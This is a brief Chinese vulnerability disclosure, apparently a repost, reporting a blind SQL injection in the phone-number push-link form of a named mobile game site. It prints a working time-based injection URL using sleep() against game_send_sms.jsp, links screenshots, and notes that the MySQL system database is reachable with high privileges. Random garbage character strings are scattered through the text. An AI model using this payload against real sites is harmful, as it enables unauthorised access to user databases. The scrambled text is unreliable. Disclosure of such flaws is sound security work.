简要描述:
# L8 X, u; L9 W' o4 w9 c0 X凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。3 `& G! I Q/ O9 y; s3 l/ c/ t
1 P! k, [3 c+ U$ x详细说明:: N: L1 w W% V& C' @5 n
存在SQL盲注url:
; a# S f# T9 W Ofenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1- w& ]! l7 G. v6 x" }; q# p
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
+ f$ j" X7 R2 Whttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png! _# V+ R3 e# l$ V- `$ I( P8 ^
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg$ ~7 P R4 { W4 ~& B( N
% e" u, Q6 z) U, `0 ^- s能看到mysql系统数据库,看来user权限应该很高的。。 |